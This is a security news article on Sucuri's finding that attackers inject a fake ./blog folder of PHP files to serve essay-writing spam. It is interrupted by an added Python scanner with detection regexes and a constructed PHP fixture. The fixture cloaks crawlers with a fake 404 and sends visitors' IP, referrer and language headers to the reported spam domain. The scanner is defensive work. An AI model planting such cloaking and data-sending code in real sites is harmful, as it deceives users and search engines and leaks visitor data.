
Write and wrong: Attackers compromise websites with subdirectory files to promote ‘essay spam’

Cybercriminals are injecting folders with malicious subdirectories into legitimate websites in order to display spam content that advertises essay-writing services for students, Sucuri has reported.

In a blog post published last Friday, Sucuri cited a recently discovered scheme in which bad actors inject a ./blog folder full of malicious PHP files into a compromised website. Although the folder appears to be a legitimate blog directory, when accessed with a web browser it displays an "essay spam" website. "What makes it even more interesting is the fact that every time you reload the page, it shows a completely different essay website," the blog post explained.

Sucuri first began looking into this technique late last year. "Instead of injecting the malware into an existent theme/plugin file to generate the spam, they added everything into a very common directory name (blog) to trick the user into thinking that the directory is valid and it shouldn't be touched," explained Sucuri remediation lead and blog post author Fernando Barbosa, in an email interview with SC Media.

The PHP code contained within the subdirectory files gathers various data from the compromised websites' visitors – including user agent, IP address, referrer and HTTP Accept-Language – and sends it to the malicious URL gotopplz[.]xyz, Sucuri noted. In response, this domain uses the JSON data interchange format to fetch content from various essay spam sites. The web security company also observed two variables sent to gotopplz[.]xyz that are likely used to identify and track individual spam campaigns so that profits generated from the illicit ad views can be allocated to the correct parties.

As a measure to prevent search engines from detecting the essay spam, the script returns a "404 Not Found" error for user agents such as Googlebot and MSNbot, Sucuri further reported. Moreover, if the script is unable to retrieve content from the malicious server, the PHP code instead serves a full HTML page of essay-writing ads, ensuring the site visitor is still subjected to the spam content.
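The traits reported above (crawler cloaking via a fake 404, harvesting of visitor headers, and a fetch from the reported domain) are enough to write a simple triage scanner for a web root. The following is an added example, not code from Sucuri or from the article; its regexes and both PHP fixtures are assumptions constructed for illustration, since the article does not reproduce the actual sample.

```python
import os
import re
from typing import Dict, List

# Domain Sucuri reported, defanged in the article as gotopplz[.]xyz.
KNOWN_SPAM_DOMAINS = {"gotopplz.xyz"}

# Patterns are assumptions about how such a script reads; the article does
# not reproduce Sucuri's sample.
BOT_UA = re.compile(r"googlebot|msnbot", re.I)
FAKE_404 = re.compile(r"404\s+Not\s+Found|http_response_code\s*\(\s*404", re.I)
VISITOR_HDR = re.compile(r"HTTP_USER_AGENT|REMOTE_ADDR|HTTP_REFERER|HTTP_ACCEPT_LANGUAGE")
REMOTE_FETCH = re.compile(r"\b(?:file_get_contents|curl_init|fsockopen)\s*\(", re.I)
URL_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def analyze_php(source: str) -> List[str]:
    """Return the spam-kit traits found in one PHP source; empty means clean."""
    reasons = []
    if {h.lower() for h in URL_HOST.findall(source)} & KNOWN_SPAM_DOMAINS:
        reasons.append("references reported essay-spam domain")
    if BOT_UA.search(source) and FAKE_404.search(source):
        reasons.append("cloaks search-engine crawlers with a fake 404")
    if len(set(VISITOR_HDR.findall(source))) >= 3 and REMOTE_FETCH.search(source):
        reasons.append("harvests visitor headers and fetches from a remote host")
    return reasons

def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Analyze every .php file under a web root, including dropped-in folders."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reasons = analyze_php(fh.read())
                if reasons:
                    findings[path] = reasons
    return findings

# Constructed fixture showing the reported traits (not Sucuri's sample).
SUSPICIOUS = """<?php
if (preg_match('/googlebot|msnbot/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 404 Not Found'); exit;
}
$v = [$_SERVER['REMOTE_ADDR'], $_SERVER['HTTP_REFERER'], $_SERVER['HTTP_ACCEPT_LANGUAGE']];
$page = file_get_contents('http://gotopplz.xyz/?v=' . urlencode(json_encode($v)));
"""
# Constructed benign fixture: a plain remote fetch with no cloaking or harvesting.
BENIGN = "<?php $feed = file_get_contents('https://example.com/feed.json');"
```

Run `scan_webroot("/var/www/html")` on a site to list every PHP file that shows one or more traits; a legitimate plugin that merely fetches remote JSON, like the benign fixture, produces no finding.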

SC Media has contacted Sucuri for additional details.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts, and video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
